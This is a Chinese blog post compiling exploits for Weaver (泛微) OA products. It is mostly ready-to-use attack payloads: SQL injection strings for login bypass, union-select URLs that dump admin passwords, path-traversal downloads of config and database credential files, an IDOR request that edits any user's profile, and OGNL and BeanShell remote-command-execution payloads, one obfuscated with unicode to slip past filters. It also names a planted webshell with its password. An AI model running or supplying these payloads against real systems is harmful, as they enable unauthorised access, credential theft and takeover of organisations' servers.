php eteams,应用安全 - 软件漏洞 - 泛微OA漏洞汇总

最新推荐文章于 2024-03-27 09:27:06 发布
最新推荐文章于 2024-03-27 09:27:06 发布
阅读量886 收藏 1
点赞数
文章标签: php eteams

SQL注入

前台SQL注入

用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a

密码: 1

验证页面参数 - loginid

(1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=

(2)/login/VerifyLogin.jsp?loginfile=%2Flogin%2Flogin.jsp%2F%3FtemplateId%3D11%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=test&userpassword=1111111111111&tokenAuthKey=&islanguid=7&submit=

未授权访问页面

//services/   存在注入

/ws/   存在注入

(3)

/weaver/weaver.file.SignatureDownLoad?markId=1  --参数markld

后台SQL注入

(1)

首先用使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

(2)

管理员情况下的注入:http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:http://127.0.0.1//cowork/CoworkLogView.jsp?id=151

普通用户注入地址:http://127.0.0.1/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址:http://127.0.0.1//system/basedata/basedata_hrm.jsp?resourceid=3

(3)

/list.do?module=2&scope=5#1

(4)

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1

任意文件下载

测试链接 http://eoffice8.weaver.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843

其中,参数 ATTACHMENT_NAME 未有效的控制其范围,导致任意文件下载

配置文件下载(程序zend加密,在网站http://www.showmycode.com/中可以解密)

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843

数据库连接文件下载

http://xx.xx.cn:8028/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843

文件上传http://xx.xx.cn:8028/attachment/2506423447/conf1g.php4 密码是8(system权限)

数据库后台访问

http://xx.xx.cn:8028/phpmyadmin/

认证缺陷-绕过登录限制进入后台则可注入的网址为 http://xx.xx.cn:8028/building/urlurl.php 直接访问显示access denied,

使用hackbar。post内容中,url为general/index.php,smsid为注入sql,内容为1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',两者都经过DES3加密后再经过base64转码,点击excute...

a604c8b0594425e7759e14ca06ad487b.png

数据库操作

/ws/query/

泛微eteams_oa系统越权修改任意用户信息

抓包得到一个链接:

https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509

这时候我们记住8005824116863355409这个东西

我们修改本用户资料处:

我们修改一下电话,然后抓包并且把里面的employee.id替换为8005824116863355409为:

url:https://www.eteams.cn/base/employee/saveProperty.json

postdata:

employee.id=8005824116863355409&propertyName=telephone&employee.telephone=test

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do

data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do

data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**:89/verifyLogin.do

data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

**.**.**.**/verifyLogin.do

data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

http://**.**.**.**/verifyLogin.do

data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

敏感文件泄露

/messager/users.data

/plugin/ewe/jsp/config.jsp

路径遍历

/plugin/ewe/admin/upload.jsp?id=11&dir=../../../

/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'

RCE

泛微e-cology OA Beanshell组件 RCE

CNNVD-201909-1041

工具:https://github.com/sunird/e-cology-poc

Payload

bsh.script=exec('whoami');

>>>>unicode bypass

bsh.script=\u0065\u0078\u0065\u0063("whoami");

影响版本 泛微e-cology<=9.0

/weaver/bsh.servlet.BshServlet

exec("whoami")  | dir("c:/") |  cat("c:/ee.txt")

SSV-98083

Date:2019.10.10类型:SQL注入

PoC:https://github.com/AdministratorGithub/e-cology-OA-SQL

SSV-98091

Date:2019.10.17类型:

SQL注入

影响范围:

泛微OA V9 V8版本

修复:

https://www.weaver.com.cn/cs/securityDownload.asp

漏洞编号:SSV-98093

Date:2019.10.25类型:

泛微E-cology OA数据库配置信息泄露漏洞

影响范围:包括不限于8.0、9.0版本

PoC:

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak

櫻花朽木
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
employee-management-system:员工管理系统,使用Spring Boot的后端实现
03-07
:gear: 员工管理系统 员工管理系统管理特定组织的员工。 ERD-实体关系图 以下用于实施ERD。 应用类别图 笔记 Press E to expand package in Class diagmram Use the following tool-bar to show dependencies and other settings. 类图 具有依赖关系的类图 对应关系 员工映射 以下是Employee的端点: 网址 要求 描述 api / v1 /员工 得到 获取所有员工 api / v1 / employee / {employee_id} 得到 获取具有给定ID的员工 api / v1 /员工 邮政 插入新员工 api / v1 / employee / {employee_id} 放 更新具有ID的员工 api / v1 / employee / {employee_id}
泛微 E-cology V9 信息泄露漏洞
孤桜懶契
06-18 4754
泛微OA E-Cology信息泄露 API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口
全网最强:泛微漏洞综合检测工具
bobo_patrick的博客
03-27 730
全网poc最全、误报最少、漏洞利用方式最多的泛微漏洞综合检测工具
泛微最新漏洞汇总----实时更新!!!
yggcwhat
07-31 3498
泛微最新漏洞汇总
CNVD-2021-49104漏洞复现(泛微E-Office文件上传漏洞
dreamthe的博客
12-05 2455
1.靶场搭建 自己下载的e-office软件运行就行了
【1day】复现泛微OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 2162
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微OA 9.0 e-cology9.0 数据字典
07-06
政务应用.zip 知识管理.zip 执行力平台.zip 资产管理.zip workflow_codeset(流程字段自动编码基础信息).html workflow_communicationapprove(相关交流点赞记录表).html workflow_communicationbase(相关交流主表)....
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
Silentsoul04#vulnerability-paper-1#泛微OA9前台任意文件上传1
07-25
泛微OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
浔川AI翻译技术建设社团
05-26
https://blog.csdn.net/2401_83104529/article/details/139215262?spm=1001.2014.3001.5501
llama-factory一个数据微调用例
05-26
llama-factory一个数据微调用例
YOLOV5 实战项目:辣椒缺陷检测(2类别)【数据+代码+训练好的权重】
05-26
基于YOLOV5 对辣椒缺陷检测(2类别)的目标检测实战项目,包含代码、数据集、训练好的权重参数,经测试,代码可以直接使用 图像分辨率为640*640的大分辨率RGB图片,数据集为采摘好的辣椒好坏检测。标注的边界框完整,每张图像均有多个目标。 【数据】(分为分为训练集和验证集) 训练集datasets-images-train:364张图片和364个标签txt文件组成 验证集datasets-images-val:88张图片和88个标签txt文件组成 【yolov5】项目总大小:62MB 项目检测测试了100个epoch,在runs目录下保存了训练结果,训练最好的精度map0.5=0.92,map0.5:0.95=0.89。网络还没收敛,加大epoch可以得到更好的结果。 训练过程中会生成验证集的混淆矩阵,PR曲线、F1曲线等等 更多yolov5改进介绍、或者如何训练,请参考: https://blog.csdn.net/qq_44886601/category_12605353.html
微信小程序-todo-app小程序项目源码-原生开发框架-含效果截图示例.zip
05-26
微信小程序凭借其独特的优势,在移动应用市场中占据了一席之地。首先,微信小程序无需下载安装,用户通过微信即可直接使用,极大地降低了使用门槛。其次,小程序拥有与原生应用相近的用户体验,同时加载速度快,响应迅速,保证了良好的使用感受。此外,微信小程序还提供了丰富的API接口,支持开发者轻松接入微信支付、用户授权等功能,为开发者提供了更多的可能性。 微信小程序-项目源码-原生开发框架。想要快速打造爆款小程序吗?这里有一份原生开发框架的项目源码等你来探索!基于微信小程序的强大生态,这份源码将带你领略原生开发的魅力,实现快速迭代与高效开发。从用户授权到微信支付,从界面设计到功能实现,一切尽在掌握。赶快下载查看,让你的小程序项目在竞争激烈的市场中脱颖而出!
IMG20240526010323.jpg
最新发布
05-26
IMG20240526010323.jpg
Golang_GoKubernetes集群的通用web UI.zip
05-26
Golang_GoKubernetes集群的通用web UI
高分项目,基于Nucleo-STM32L073&机智云开发的物联网智能家居系统,内含物联网智能家居方案,完整源码
05-26
高分项目,基于Nucleo-STM32L073&机智云开发的物联网智能家居系统,内含物联网智能家居方案,完整源码 利 全球领先的 用第三方云平台 机智云 ,打造了 基于 超低功耗 Nuleo STM32 L073 的 物联 网 应用系统 实现 的 功能 有: a) 远程手机 APP 控制 RGB LED 的颜色(红、绿、蓝); b) 自带 3 种混合色,黄色、紫色、粉色, 一键切换所需颜色; c) 远程手机 APP 控制 直流电机的正反转 d) 远程手机 APP 显示温湿度 e) 红外传感器障碍物检测; 机智云是智能硬件时代专为硬件提供后台支持的云服务平台,服务的内容主要包括了统计分 析、数据安全、远程管理、软件升级等。 GoKit 是 机智云推出的一套智能硬件开发板, Gokit 扩展板采用 Arduino UNO 接口,板载 ESP8266 12F WiFi 模块、温湿度传感器 DHT11 、 2 个 按键、障碍物红外检测模块、微型直流电机、 RGB 5050 全彩 LED 。
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值